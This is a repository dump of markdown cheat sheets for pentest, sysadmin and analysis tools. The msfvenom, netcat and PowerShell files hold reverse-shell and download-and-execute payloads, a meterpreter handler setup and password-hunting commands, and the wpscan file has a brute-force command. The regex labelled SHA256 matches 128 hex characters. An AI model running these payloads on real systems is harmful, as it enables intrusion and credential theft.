| Windows Exec Nishang Powershell in python 71 | 72 | ```sh 73 | msfvenom -a x86 --platform Windows -p windows/exec CMD="powershell \"IEX(New-Object Net.webClient).downloadString('http://IP/nishang.ps1')\"" -f python 74 | ``` 75 | 76 | Bad characters shikata_ga_nai: 77 | 78 | ```sh 79 | msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST= LPORT= -f c -e x86/shikata_ga_nai -b "\x04\xA0" 80 | ``` 81 | 82 | Bad characters fnstenv_mov: 83 | 84 | ```sh 85 | msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST= LPORT= -f c -e x86/fnstenv_mov -b "\x04\xA0" 86 | ``` 87 | 88 | ### Misc 89 | 90 | Python Shell: 91 | 92 | ```sh 93 | msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py 94 | ``` 95 | 96 | Bash Shell: 97 | 98 | ```sh 99 | msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh 100 | ``` 101 | 102 | Perl Shell: 103 | 104 | ```sh 105 | msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl 106 | ``` 107 | 108 | ASP Meterpreter Shell: 109 | 110 | ```sh 111 | msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp 112 | ``` 113 | 114 | PHP Reverse Shell: 115 | 116 | ```sh 117 | msfvenom -p php/reverse_php LHOST= LPORT= -f raw > phpreverseshell.php 118 | ``` 119 | 120 | To get multiple session on a single multi/handler, you need to set the 121 | ExitOnSession option to false and run the exploit -j instead of just the 122 | exploit. For example, for meterpreter/reverse_tcp payload: 123 | 124 | ``` 125 | msf>use exploit/multi/handler 126 | msf>set payload windows/meterpreter/reverse_tcp 127 | msf>set lhost 128 | msf>set lport 129 | msf> set ExitOnSession false 130 | msf>exploit -j 131 | ``` 132 | -------------------------------------------------------------------------------- /mypy.md: -------------------------------------------------------------------------------- 1 | # Mypy 2 | 3 | Install missing types stubs: 4 | ``` 5 | mypy --install-types 6 | ``` 7 | 8 | Check but ignore import errors: 9 | ``` 10 | mypy --ignore-missing-imports PATH 11 | ``` 12 | -------------------------------------------------------------------------------- /mysql.md: -------------------------------------------------------------------------------- 1 | # MySQL 2 | 3 | **Connect**: 4 | ``` 5 | mysql -u root -p 6 | ``` 7 | 8 | **List databases:** 9 | ``` 10 | show databases ; 11 | ``` 12 | 13 | **Use a database:** 14 | ``` 15 | use DATABASE; 16 | ``` 17 | 18 | **List tables:** 19 | ``` 20 | show tables; 21 | ``` 22 | 23 | **List users:** 24 | ``` 25 | SELECT User FROM mysql.user; 26 | ``` 27 | 28 | **Create user and grant access to a db:** 29 | ``` 30 | CREATE USER 'newuser'@'localhost' IDENTIFIED BY 'password'; 31 | GRANT ALL PRIVILEGES ON * . * TO 'newuser'@'localhost'; 32 | ``` 33 | -------------------------------------------------------------------------------- /nbtscan.md: -------------------------------------------------------------------------------- 1 | # Nbtscan 2 | 3 | Scan for NetBios 4 | 5 | ```sh 6 | nbtscan 7 | nbtscan -O 8 | # generate an HTTP header 9 | nbtscan -H 10 | # Turns off this inverse name lookup, for hanging resolution 11 | nbtscan -n 12 | # PORT target(s) - This allows specification of a UDP port number to be used as the source in sending a query 13 | nbtscan -p 14 | ``` 15 | -------------------------------------------------------------------------------- /netcat.md: -------------------------------------------------------------------------------- 1 | # Netcat 2 | 3 | 4 | **Basic bind shell:** 5 | ```sh 6 | nc -nvlp 443 # On local Kali 7 | nc -nv 443 # On remote 8 | ``` 9 | 10 | **Basic reverse shell:** 11 | ```sh 12 | sudo nc -nlvp 443 # On local Kali 13 | nc -nv 443 -e cmd.exe # On remote Windows 14 | nc -nv 443 -e /bin/bash # On remote Linux 15 | ``` 16 | 17 | **Sending files:** 18 | ```sh 19 | sudo nc -nvlp 443 > incoming.exe # Reciever 20 | nc -nv 443 < incoming.exe # Sender 21 | ``` 22 | -------------------------------------------------------------------------------- /nmap.md: -------------------------------------------------------------------------------- 1 | # Nmap 2 | 3 | 4 | **Quickstart:** 5 | 6 | ```sh 7 | nmap -sC -sV --top-ports 20 -o 8 | nmap -sC -sV --open --reason -o 9 | ``` 10 | 11 | **Full ports scan:** 12 | 13 | ```sh 14 | nmap -sV -sC -p- -O --open -o 15 | ``` 16 | 17 | **Ping sweep:** 18 | 19 | ```sh 20 | nmap -sn -PE 21 | ``` 22 | 23 | **UDP scan:** 24 | 25 | ```sh 26 | nmap -sU 27 | ``` 28 | 29 | **Scan for open ports, determine open services:** 30 | 31 | ```sh 32 | nmap --open -sV 33 | ``` 34 | 35 | **Retrieve a TLS certificate:** 36 | ``` 37 | nmap -p 443 –script ssl-cert didierstevens.com 38 | ``` 39 | 40 | **Scan and run default scripts:** 41 | 42 | ```sh 43 | nmap -sC 44 | ``` 45 | 46 | **Run a specific script:** 47 | 48 | ```sh 49 | # location on Kali: /usr/share/nmap/scripts/ 50 | nmap --script 51 | ``` 52 | 53 | **Skip ping:** 54 | 55 | ```sh 56 | nmap -Pn 57 | ``` 58 | 59 | **Output result to file:** 60 | 61 | ```sh 62 | nmap -o # text file 63 | nmap -oG # greppable file 64 | nmap -oN # nmap file 65 | nmap -oA # all formats 66 | ``` 67 | -------------------------------------------------------------------------------- /objdump.md: -------------------------------------------------------------------------------- 1 | # objdump 2 | 3 | **Reverse shellcode**: 4 | ``` 5 | objdump -D -b binary -m i386 -M intel shellcode.bin 6 | ``` 7 | -------------------------------------------------------------------------------- /openssl.md: -------------------------------------------------------------------------------- 1 | # Openssl 2 | 3 | **Parse and print PEM certificate infos:** 4 | ``` 5 | openssl x509 -in cert.crt -text 6 | ``` 7 | 8 | **Same with DER** (read .crl too): 9 | ``` 10 | openssl x509 -in cert.crt -inform der -text 11 | ``` 12 | 13 | **Verify a certificate:** 14 | ``` 15 | openssl verify -CAfile <(cat Intermediate.pem RootCert.pem) UserCert.pem 16 | ``` 17 | 18 | **Download and show info on an online certificate** 19 | ``` 20 | openssl s_client -showcerts -connect DOMAIN:443 /dev/null | openssl x509 -text 21 | ``` 22 | 23 | **Get fingerprint of a certificate** 24 | ``` 25 | openssl x509 -noout -fingerprint -md5 -inform pem -in [certificate-file.crt] 26 | ``` 27 | 28 | **Remotely check a certificate:** 29 | ``` 30 | openssl s_client -showcerts -connect www.domain.com:443 31 | ``` 32 | 33 | **Print a PKCS7 certificate:** 34 | ``` 35 | openssl pkcs7 -inform DER -print_certs -text -in FILE 36 | ``` 37 | -------------------------------------------------------------------------------- /pdf-parser.md: -------------------------------------------------------------------------------- 1 | # pdf-parser 2 | 3 | **See stats** 4 | ``` 5 | pdf-parser.py --stats FILE.PDF 6 | ``` 7 | 8 | **Search for javascript objects** 9 | ``` 10 | pdf-parser.py --search javascript FILE.PDF 11 | ``` 12 | 13 | **See objects referencing another object** 14 | ``` 15 | pdf-parser.py --reference 45 --raw FILE.PDF 16 | ``` 17 | 18 | **See object details** 19 | ``` 20 | pdf-parser.py --object 45 --raw FILE.PDF 21 | ``` 22 | -------------------------------------------------------------------------------- /pdf.md: -------------------------------------------------------------------------------- 1 | # pdf 2 | 3 | Best tools are pdfid, pdf-parser and peepdf (python2 only) 4 | 5 | **First use pdfid to have an overview of what is inside the pdf:** 6 | ``` 7 | pdfid.py PDF.PDF 8 | ``` 9 | 10 | **Display stats with pdf-parser:** 11 | ``` 12 | pdf-parser.py -a PDF.PDF 13 | ``` 14 | 15 | **Parse the whole pdf with pdf-parser:** 16 | ``` 17 | pdf-parser.py PDF.PDF 18 | ``` 19 | 20 | **Show detail on a specific object:** 21 | ``` 22 | pdf-parser.py --object id file.pdf 23 | ``` 24 | 25 | **Search for javascript:** 26 | ``` 27 | pdf-parser.py --search=javascript pdf.pdf 28 | ``` 29 | 30 | Search for : 31 | * / OpenAction && /AA #usually where the script or action will run automatically 32 | * /JavaScript & /JS where JS will run 33 | * / GoTo will change the view to a specified destination within the PDF or in another PDF 34 | * /Launch will launch a program or open a document 35 | * /URI open a URL 36 | * / SubmitForm / GoToR can send data to URL 37 | * / RichMeda can be used to embed flash 38 | * / ObjStm can hide objects inside it 39 | * Obfsucation with hex code, is a pattern i.e. /JavaScript vs. /J#61vaScripto 40 | -------------------------------------------------------------------------------- /pip.md: -------------------------------------------------------------------------------- 1 | # Pip 2 | 3 | **Install specific version:** 4 | ``` 5 | pip install maxminddb==1.2.1 6 | ``` 7 | 8 | **Upgrade packages:** 9 | ``` 10 | pip install Django --upgrade 11 | ``` 12 | 13 | **Automatically create requirements:** 14 | ``` 15 | pip freeze > requirements.txt 16 | ``` 17 | -------------------------------------------------------------------------------- /powershell.md: -------------------------------------------------------------------------------- 1 | # Powershell 2 | 3 | **Ping scan:** 4 | ```powershell 5 | 1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("", $_)) "Port 6 | $_ is open!"} 2>$null 7 | ``` 8 | 9 | 10 | **Download remote files:** 11 | ```powershell 12 | powershell "(New-Object System.Net.WebClient).DownloadFile("", 13 | )" 14 | ``` 15 | 16 | 17 | **Look for passwords:** 18 | ```powershell 19 | reg query HKLM /f password /t REG_SZ /s 20 | reg query HKCU /f password /t REG_SZ /s 21 | dir /s *pass* == *.config 22 | findstr /si password *.xml *.ini *.txt *.bat *.ps1 23 | # don't forget that this exists 24 | ls -force 25 | ``` 26 | 27 | **Specific string search:** 28 | ```powershell 29 | ls -r C:\PATH -file | {Select-String -path $_ -pattern } 30 | ``` 31 | 32 | **Credentials:** 33 | ```powershell 34 | # Import credentials from a xml powershell file 35 | $creds = Import-CliXml -Path C:\Users\file.txt 36 | $creds.GetNetworkCredential().Password 37 | 38 | # it is also possible to grab the current user's credential with 39 | Get-Credential 40 | # or for a specific user 41 | Get-Credential -credential $user 42 | ``` 43 | 44 | Get-Credential returns an object for which there is a good 45 | [documentation](https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/get-credential?view=powershell-7). 46 | 47 | However, it might not run if you are not the user you try to get credential for. 48 | 49 | **Send remote files to host:** 50 | ```powershell 51 | Invoke-Webrequest -Uri -OutFile 52 | 53 | # Win 7 54 | (New-Object System.Net.WebClient).DownloadFile("http:///nc.exe", "c:\nc.exe") 55 | 56 | # Win 8 and later 57 | wget "http:///nc.exe" -outfile "c:\nc.exe" 58 | ``` 59 | 60 | **Firewall:** 61 | ```powershell 62 | # Get Firewall rules 63 | Get-NetFirewallRule -all | Out-GridView 64 | Get-NetFirewallRule -all | Export-csv 65 | 66 | # Add a Firewall rule 67 | New-NetFirewallRule -Action Allow -DisplayName -RemoteAddress 68 | ``` 69 | -------------------------------------------------------------------------------- /psql.md: -------------------------------------------------------------------------------- 1 | # PostGresQL 2 | 3 | **Connect to psql with postgres user (most common local authent)** 4 | ```bash 5 | sudo -u postgres psql 6 | ``` 7 | 8 | **Connect with psql** 9 | ```bash 10 | psql -h -p -u 11 | psql -h -p -U -W 12 | ``` 13 | 14 | **List tables** 15 | ``` 16 | \dt 17 | ``` 18 | 19 | **List databases** 20 | ``` 21 | \l 22 | ``` 23 | 24 | **List users:** 25 | ``` 26 | \du 27 | ``` 28 | 29 | **Use a database:** 30 | ``` 31 | \c DATABASE 32 | ``` 33 | 34 | **Dump from docker :** 35 | ``` 36 | docker exec -t your-db-container pg_dumpall -c -U postgres > dump_`date +%d-%m-%Y"_"%H_%M_%S`.sql 37 | ``` 38 | 39 | Create db and user: 40 | ``` 41 | CREATE DATABASE yourdbname; 42 | CREATE USER youruser WITH ENCRYPTED PASSWORD 'yourpass'; 43 | GRANT ALL PRIVILEGES ON DATABASE yourdbname TO youruser; 44 | ``` 45 | -------------------------------------------------------------------------------- /python.md: -------------------------------------------------------------------------------- 1 | # Python 2 | 3 | **Web server (python2)** 4 | ```python 5 | python -m SimpleHTTPServer 8000 6 | ``` 7 | 8 | **Web server (python3)** 9 | ```python 10 | python -m http.server 8000 11 | ``` 12 | 13 | **argparse:** 14 | ``` 15 | parser = argparse.ArgumentParser(description='Process some integers.') 16 | parser.add_argument('integers', metavar='N', type=int, nargs='+', 17 | help='an integer for the accumulator') 18 | parser.add_argument('--sum', dest='accumulate', action='store_const', 19 | const=sum, default=max, 20 | help='sum the integers (default: find the max)') 21 | 22 | args = parser.parse_args() 23 | ``` 24 | 25 | **pretty print with json:** 26 | ``` 27 | print(json.dumps({'4': 5, '6': 7}, sort_keys=True, indent=4)) 28 | ``` 29 | 30 | **Build and upload project to pypi:** 31 | ``` 32 | python3 -m build 33 | python3 -m twine upload dist/* 34 | ``` 35 | -------------------------------------------------------------------------------- /regex.md: -------------------------------------------------------------------------------- 1 | # regex 2 | 3 | **Email** 4 | ``` 5 | /^([a-zA-Z0-9._%-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,6})*$/ 6 | /^([a-z0-9_\.-]+)@([\da-z\.-]+)\.([a-z\.]{2,6})$/ 7 | ``` 8 | 9 | **URL** 10 | ``` 11 | /https?:\/\/(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#()?&//=]*)/ 12 | /(https?:\/\/)?(www\.)?[-a-zA-Z0-9@:%._\+~#=]{2,256}\.[a-z]{2,6}\b([-a-zA-Z0-9@:%_\+.~#?&//=]*)/ 13 | ``` 14 | 15 | **IP** 16 | ``` 17 | /* Match IPv4 address */ 18 | /^(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])$/ 19 | 20 | /* Match IPv6 address */ 21 | /(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])\.){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))/ 22 | ``` 23 | 24 | **Dates** 25 | ``` 26 | /* Date Format YYYY-MM-dd */ 27 | /([12]\d{3}-(0[1-9]|1[0-2])-(0[1-9]|[12]\d|3[01]))/ 28 | ``` 29 | 30 | **Hashes** 31 | ``` 32 | /* MD5 */ 33 | /(?:[^a-fA-F\d]|\b)([a-fA-F\d]{32})(?:[^a-fA-F\d]|\b)/ 34 | /* SHA1 */ 35 | /(?:[^a-fA-F\d]|\b)([a-fA-F\d]{40})(?:[^a-fA-F\d]|\b)/ 36 | /* SHA256 */ 37 | /(?:[^a-fA-F\d]|\b)([a-fA-F\d]{128})(?:[^a-fA-F\d]|\b)/ 38 | ``` 39 | 40 | 41 | -------------------------------------------------------------------------------- /sed.md: -------------------------------------------------------------------------------- 1 | # Sed 2 | 3 | **Remove brackets in a domain name (for IOCs)** 4 | ```bash 5 | sed -E 's/\.([a-z]*)$/[.]\1/g' 6 | ``` 7 | 8 | **Remove commends from a file:** 9 | ``` 10 | sed '/^#/ d' 11 | ``` 12 | -------------------------------------------------------------------------------- /snort.md: -------------------------------------------------------------------------------- 1 | # Snort 2 | 3 | **Running snort on a pcap** (rules have to be defined in the conf file): 4 | ``` 5 | snort -r file.pcap -c snort.conf 6 | ``` 7 | 8 | **Basic rule example**: 9 | ``` 10 | alert tcp any any -> $HOME_NET 22 (content:"/bin/sh"; msg:"Possible SSH buffer overflow"; ) 11 | ``` 12 | 13 | **Example of rule with PCRE** (pcre: "/regex/flags"): 14 | ``` 15 | alert tcp any any -> any any(msg:"PDF is being downloaded"; pcre:"/.*site\/year\d\d\d\d.pdf/i"; sid: 100003; rev:3;) 16 | ``` 17 | 18 | **Help** : 19 | * Hex encoding in content : `content:"|5c 00|P|00|I|00|P|00|E|00 5c|";` 20 | * Characters ", | and ; must be escaped inside a content option with \ or hex encoding 21 | 22 | **Performance rules**: 23 | * Flow matters: `flow:to_client,established;` or `flow:to_server,established;` 24 | * Use content to prefilter if you use PCRE 25 | 26 | 27 | -------------------------------------------------------------------------------- /sqlite.md: -------------------------------------------------------------------------------- 1 | # SQLite 2 | 3 | **Run an SQL file:** 4 | ``` 5 | sqlite3 auction.db < create.sql 6 | ``` 7 | -------------------------------------------------------------------------------- /ssh.md: -------------------------------------------------------------------------------- 1 | # ssh (and other related commands) 2 | 3 | **Generate ssh key** 4 | ```bash 5 | ssh-keygen -o -a 100 -t ed25519 6 | ``` 7 | 8 | **Force password authentication**: 9 | ```bash 10 | ssh -o PreferredAuthentications=password -o PubkeyAuthentication=no example.com 11 | ``` 12 | 13 | **Search for a server line in known_hosts**: 14 | ```bash 15 | ssh-keygen -l -F SERVER 16 | ``` 17 | 18 | **Ignore new key warning:** 19 | ```bash 20 | ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no user@IP 21 | ``` 22 | -------------------------------------------------------------------------------- /strings.md: -------------------------------------------------------------------------------- 1 | # Strings 2 | 3 | **Search for unicode strings (16-bit little endian encoding here)** 4 | ``` 5 | strings -el FILE 6 | (s = single-7-bit-byte characters (ASCII, ISO 8859, etc., default), S = single-8-bit-byte characters, b = 16-bit bigendian, l = 16-bit littleendian, B = 32-bit bigendian, L = 32-bit littleendian) 7 | ``` 8 | 9 | **Print offset in decimal** 10 | ``` 11 | strings -td FILE 12 | ``` 13 | -------------------------------------------------------------------------------- /svn.md: -------------------------------------------------------------------------------- 1 | # svn 2 | 3 | * Organisation : 4 | * **trunk** is the main line of development in a SVN repository 5 | * **branch** is a side-line of development created to make larger, experimental or disrupting work 6 | * **tags** are markers to highlight notable revisions in the history of the repository 7 | * Create a local working copy : `svn checkout URL PATH` 8 | * Add a file to the repo : `svn add FILE` 9 | * Commit changes to the remote repo : `svn commit -m "log messages"` 10 | * Download remote updates : `svn update` 11 | * See changes of a file : `svn log` 12 | * See status of the repo : `svn status` 13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /tar.md: -------------------------------------------------------------------------------- 1 | # Tar 2 | 3 | **Decompress things:** 4 | 5 | ```sh 6 | tar xf archive.tar 7 | tar xvzf archive.tar.gz 8 | tar xjf archive.tar.bz2 9 | tar xtvf file.tar.gz | grep 10 | tar -C -xvf 11 | unzip archive.zip 12 | gzip -d archive.gz 13 | 14 | # read a gz file without decompressing 15 | zcat archive.gz 16 | zless archive.gz 17 | zgrep /var/log/mailliog*.gz 18 | 19 | # Search instide a zip archive 20 | zipgred *.txt archive.zip 21 | ``` 22 | 23 | **Compress things:** 24 | 25 | ```sh 26 | zip -r file.zip /dir/* 27 | tar cf archive.tar files 28 | tar czf archive.tar.gz files 29 | tar cjf archive.tar.bz2 files 30 | gzip file 31 | ``` 32 | -------------------------------------------------------------------------------- /tmux.md: -------------------------------------------------------------------------------- 1 | # tmux 2 | 3 | **Share a console** 4 | ``` 5 | # Me 6 | $ tmux -S /tmp/pair 7 | $ chmod 777 /tmp/pair 8 | 9 | # Another user 10 | $ tmux -S /tmp/pair attac 11 | ``` 12 | -------------------------------------------------------------------------------- /useragent.md: -------------------------------------------------------------------------------- 1 | # Useful User-Agents 2 | 3 | 4 | **Office** (see https://github.com/ua-parser/uap-core/issues/32): 5 | ``` 6 | Microsoft Office/15.0 (Windows NT 6.2; Microsoft Word 15.0.4693; Pro) 7 | Microsoft Office/16.0 (Microsoft Outlook Mail 16.0.6310; Pro) 8 | Microsoft Office/15.0 (Windows NT 6.2; Microsoft Excel 15.0.4693; Pro) 9 | ``` 10 | 11 | **Chrome on Windows:** 12 | ``` 13 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 14 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 15 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 16 | ``` 17 | 18 | **Chrome on MacOS:** 19 | ``` 20 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36 21 | ``` 22 | 23 | **Chrome on Iphone:** 24 | ``` 25 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.123 Mobile/15E148 Safari/605.1 26 | ``` 27 | 28 | **Chrome on Android:** 29 | ``` 30 | Mozilla/5.0 (Linux; Android 10; SM-G970F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3396.81 Mobile Safari/537.36 31 | Mozilla/5.0 (Linux; Android 9; Redmi Note 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Mobile Safari/537.36 32 | Mozilla/5.0 (Linux; Android 8.0.0;) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Mobile Safari/537.36 33 | Mozilla/5.0 (Linux; Android 8.0.0; TA-1053 Build/OPR1.170623.026) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3368.0 Mobile Safari/537.36 34 | Mozilla/5.0 (Linux; Android 4.0.4; Galaxy Nexus Build/IMM76B) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.133 Mobile Safari/535.19 35 | ``` 36 | 37 | **Safari on iOS:** 38 | ``` 39 | Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/ 604.1.21 (KHTML, like Gecko) Version/ 12.0 Mobile/17A6278a Safari/602.1.26 40 | Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A356 Safari/604.1 41 | Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_1 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A403 Safari/602.1 42 | ``` 43 | 44 | -------------------------------------------------------------------------------- /vagrant.md: -------------------------------------------------------------------------------- 1 | # vagrant 2 | 3 | * **vagrant up** : Create and install the machine 4 | * **vagrant provision**: launch setup on an existing machine 5 | * **vagrant ssh**: ssh to the machine 6 | * **vagrant suspend**: suspend the machine 7 | * **vagrant halt**: shutdown the operating system, keep the VM 8 | * **vagrant destroy**: destroy the VM 9 | * **vagrant resume**: resume a suspended VM 10 | * **vagrant box list** : list existing boxes 11 | * **vagrant box add bento/ubuntu-18.04** : Install a new box 12 | -------------------------------------------------------------------------------- /vim.md: -------------------------------------------------------------------------------- 1 | # (n)Vim 2 | 3 | 4 | **Remove blank lines:** 5 | ``` 6 | :g/^$/d 7 | ``` 8 | 9 | **Remove return carriage:** 10 | ``` 11 | %s/^M//g 12 | ``` 13 | 14 | **Replace something:** 15 | ``` 16 | %s/origin/destination/g 17 | ``` 18 | 19 | **Sort lines:** 20 | ``` 21 | CTRL-V and select lines or do ggVG 22 | :sort 23 | 24 | For invert sort: 25 | :%sort! 26 | 27 | For numerical sort: 28 | :sort n 29 | ``` 30 | -------------------------------------------------------------------------------- /wget.md: -------------------------------------------------------------------------------- 1 | # wget 2 | 3 | **Continue download from where is stopped if connection breaks:** 4 | ``` 5 | wget -c URL 6 | ``` 7 | 8 | **Download files recursively files:** 9 | ``` 10 | wget -r -np http://example.com/configs/.vim/ 11 | ``` 12 | 13 | **Change user agent:** 14 | ``` 15 | wget --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" URL 16 | ``` 17 | 18 | -------------------------------------------------------------------------------- /wordpress.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | 3 | Wordpress CLI : 4 | * Verify Wordpress checksums : `wp core verify-checksums` 5 | * Get Wordpress version : `wp core version` 6 | * List users : `wp user list` 7 | * List plugins : `wp plugin list` 8 | * List posts : `wp post list` 9 | * List deleted posts : `wp post list --post_status=trash` 10 | * Update uptions : `wp option update home 'http://example.com'` 11 | * Search and replace in db : `wp search-replace 'example.dev' 'example.com' --skip-columns=guid` 12 | 13 | -------------------------------------------------------------------------------- /wp.md: -------------------------------------------------------------------------------- 1 | # Wordpress 2 | 3 | **Change url:** 4 | ``` 5 | wp option update home 'http://example.com' 6 | wp option update siteurl 'http://example.com' 7 | ``` 8 | -------------------------------------------------------------------------------- /wpscan.md: -------------------------------------------------------------------------------- 1 | # WPScan 2 | 3 | **Quick install:** 4 | ``` 5 | gem install wpscan 6 | ``` 7 | 8 | **Update the database:** 9 | ``` 10 | wpscan --update 11 | ``` 12 | 13 | **Enumerate vulnerable plugins:** 14 | ``` 15 | wpscan --url http://yourwebsite.com --enumerate vp 16 | ``` 17 | 18 | **Enumerate users:** 19 | ``` 20 | wpscan --url http://yourwebsite.com --enumerate u 21 | ``` 22 | 23 | **Password bruteforce:** 24 | ``` 25 | wpscan --url www.example.com --wordlist wordlist_file.txt --threads 30 --username admin 26 | ``` 27 | 28 | 29 | -------------------------------------------------------------------------------- /xpath.md: -------------------------------------------------------------------------------- 1 | # Xpath 2 | 3 | **All javascript scripts:** 4 | ``` 5 | //script[@src]/@src 6 | ``` 7 | 8 | **All CSS sheets:** 9 | ``` 10 | //link[@rel="stylesheet"][@href]/@href 11 | ``` 12 | -------------------------------------------------------------------------------- /yara.md: -------------------------------------------------------------------------------- 1 | # Yara 2 | 3 | **Rule example :** 4 | 5 | ``` 6 | rule EXAMPLE { 7 | meta: 8 | author = "ME" 9 | 10 | strings: 11 | $s1 = "string" ascii 12 | 13 | condition: 14 | all of them 15 | } 16 | ``` 17 | 18 | **Consider only files with MZ header** 19 | ```bash 20 | condition: 21 | uint16(0) == 0x5A4D and 3 of the 22 | ``` 23 | 24 | **Consider only files with MZ and PE header** 25 | ```bash 26 | condition: 27 | uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and 2 of them 28 | ``` 29 | 30 | **Consider only DEX files**: 31 | ``` 32 | condition: 33 | uint16(0) == 0x6564 and all of them 34 | ``` 35 | 36 | **Consider only a sublist of strings**: 37 | ``` 38 | strings: 39 | $mandatory = "aa" 40 | $optional1 = "bb" 41 | $optional2 = "cc" 42 | $optional3 = "dd" 43 | condition: 44 | $mandatory and 2 of ($optional*) 45 | ``` 46 | 47 | **Hex strings:** 48 | ``` 49 | $hex_string = { E2 34 ?? C8 A? FB } 50 | ``` 51 | 52 | **Check for doc header with macro:** 53 | ``` 54 | strings: 55 | $a = {d0 cf 11 e0} 56 | $b = {00 41 74 74 72 69 62 75 74 00} 57 | condition: 58 | $a at 0 and $b 59 | ``` 60 | -------------------------------------------------------------------------------- /zeek.md: -------------------------------------------------------------------------------- 1 | # Zeek 2 | 3 | Analyse a pcap from the docker instance: 4 | ``` 5 | docker pull zeek/zeek:latest 6 | docker run -v $(pwd):/data -w /data/ -it zeek/zeek /usr/local/zeek/bin/zeek -r /data/FILE 7 | ``` 8 | --------------------------------------------------------------------------------